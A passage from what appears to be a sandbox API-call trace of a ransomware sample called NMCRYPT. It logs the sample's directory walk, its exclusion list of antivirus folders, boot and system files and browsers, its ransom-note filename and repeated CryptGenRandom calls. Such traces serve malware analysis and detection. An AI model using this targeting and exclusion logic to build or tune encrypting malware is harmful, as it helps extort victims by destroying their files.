(pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.msi") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*.scf") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*pagefile.sys*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*AppData*") returned 0 [0166.429] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\winrar\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\java\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\windows\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\ESET\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\AVG\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*Atheros*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*Realtek*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*bootmgr*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*boot*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*boot*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*IO.SYS*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*ntldr*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*chrome*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*opera*") returned 0 [0166.430] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", pszSpec="*firefox*") returned 0 [0166.430] wcslen (_String="\\\\?\\") returned 0x4 [0166.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad438 [0166.431] wcscmp (_String1=".", _String2=".") returned 0 [0166.431] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.431] wcscmp (_String1="..", _String2=".") returned 1 [0166.431] wcscmp (_String1="..", _String2="..") returned 0 [0166.431] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.431] PathMatchSpecW (pszFile="msdia100.dll", pszSpec="*NMCRYPT") returned 0 [0166.431] PathMatchSpecW (pszFile="msdia100.dll", pszSpec="*Recovers your files.html") returned 0 [0166.431] PathMatchSpecW (pszFile="msdia100.dll", pszSpec="*.exe") returned 0 [0166.431] PathMatchSpecW (pszFile="msdia100.dll", pszSpec="*.dll") returned 1 [0166.431] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.431] PathMatchSpecW (pszFile="msdia90.dll", pszSpec="*NMCRYPT") returned 0 [0166.431] PathMatchSpecW (pszFile="msdia90.dll", pszSpec="*Recovers your files.html") returned 0 [0166.431] PathMatchSpecW (pszFile="msdia90.dll", pszSpec="*.exe") returned 0 [0166.431] PathMatchSpecW (pszFile="msdia90.dll", pszSpec="*.dll") returned 1 [0166.431] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0166.431] GetLastError () returned 0x12 [0166.431] FindClose (in: hFindFile=0x9ad438 | out: hFindFile=0x9ad438) returned 1 [0166.431] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.431] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.431] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.431] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.431] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.431] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.exe") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.dll") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.lnk") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.bat") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.ini") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.msi") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*.scf") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*pagefile.sys*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*AppData*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\winrar\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\java\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\windows\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\ESET\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\AVG\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*Atheros*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*Realtek*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*bootmgr*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*boot*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*boot*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*IO.SYS*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*ntldr*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*chrome*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*opera*") returned 0 [0166.432] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", pszSpec="*firefox*") returned 0 [0166.432] wcslen (_String="\\\\?\\") returned 0x4 [0166.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VGX\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad3b8 [0166.432] wcscmp (_String1=".", _String2=".") returned 0 [0166.432] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.432] wcscmp (_String1="..", _String2=".") returned 1 [0166.432] wcscmp (_String1="..", _String2="..") returned 0 [0166.432] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.432] PathMatchSpecW (pszFile="VGX.dll", pszSpec="*NMCRYPT") returned 0 [0166.432] PathMatchSpecW (pszFile="VGX.dll", pszSpec="*Recovers your files.html") returned 0 [0166.433] PathMatchSpecW (pszFile="VGX.dll", pszSpec="*.exe") returned 0 [0166.433] PathMatchSpecW (pszFile="VGX.dll", pszSpec="*.dll") returned 1 [0166.433] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0166.433] GetLastError () returned 0x12 [0166.433] FindClose (in: hFindFile=0x9ad3b8 | out: hFindFile=0x9ad3b8) returned 1 [0166.433] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0166.433] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.433] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.433] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0166.433] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.433] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.exe") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.dll") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.lnk") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.bat") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.ini") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.msi") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*.scf") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*pagefile.sys*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*NTUSER.DAT*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*AppData*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\winrar\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\java\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\windows\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\ESET\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\AVG\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\AVIRA\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*Atheros*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*Realtek*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*bootmgr*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*boot*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*boot*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*CONFIG.SYS*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*IO.SYS*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*MSDOS.SYS*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*NTDETECT.COM*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*ntldr*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*chrome*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*opera*") returned 0 [0166.433] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", pszSpec="*firefox*") returned 0 [0166.433] wcslen (_String="\\\\?\\") returned 0x4 [0166.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad6b8 [0166.434] wcscmp (_String1=".", _String2=".") returned 0 [0166.434] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.434] wcscmp (_String1="..", _String2=".") returned 1 [0166.434] wcscmp (_String1="..", _String2="..") returned 0 [0166.434] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.434] wcscmp (_String1="10.0", _String2=".") returned 1 [0166.434] wcscmp (_String1="10.0", _String2="..") returned 1 [0166.434] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.434] PathMatchSpecW (pszFile="vstoee.dll", pszSpec="*NMCRYPT") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee.dll", pszSpec="*Recovers your files.html") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee.dll", pszSpec="*.exe") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee.dll", pszSpec="*.dll") returned 1 [0166.434] FindNextFileW (in: hFindFile=0x9ad6b8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*NMCRYPT") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*Recovers your files.html") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.exe") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.dll") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.lnk") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.bat") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.ini") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.msi") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*.scf") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*pagefile.sys*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*AppData*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\winrar\\*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\java\\*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\windows\\*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\ESET\\*") returned 0 [0166.434] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\AVG\\*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*Atheros*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*Realtek*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*bootmgr*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*boot*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*boot*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*IO.SYS*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*ntldr*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*chrome*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*opera*") returned 0 [0166.435] PathMatchSpecW (pszFile="vstoee100.tlb", pszSpec="*firefox*") returned 0 [0166.435] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb", pszSpec="*") returned 1 [0166.435] strlen (_Str="NMoreira") returned 0x8 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.435] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.436] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 